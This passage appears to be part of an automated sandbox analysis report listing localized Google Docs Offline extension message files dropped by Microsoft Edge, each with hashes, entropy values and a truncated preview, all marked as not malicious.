                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1160
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                                                    MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                                                    SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                                                    SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                                                    SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):3264
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                                                    MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                                                    SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                                                    SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                                                    SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):3235
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                                                    MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                                                    SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                                                    SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                                                    SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):3122
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                                                    MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                                                    SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                                                    SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                                                    SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1895
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                                                    MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                                                    SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                                                    SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                                                    SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1042
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                                                    MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                                                    SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                                                    SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                                                    SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2535
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                                                    MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                                                    SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                                                    SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                                                    SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1028
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                                                    MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                                                    SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                                                    SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                                                    SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):994
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                                                    MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                                                    SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                                                    SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                                                    SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2091
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                                                    MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                                                    SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                                                    SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                                                    SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2778
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                                                    MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                                                    SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                                                    SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                                                    SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1719
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                                                    MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                                                    SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                                                    SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                                                    SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):936
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                                                    MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                                                    SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                                                    SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                                                    SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):3830
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                                                    MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                                                    SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                                                    SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                                                    SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                                                    Malicious:false
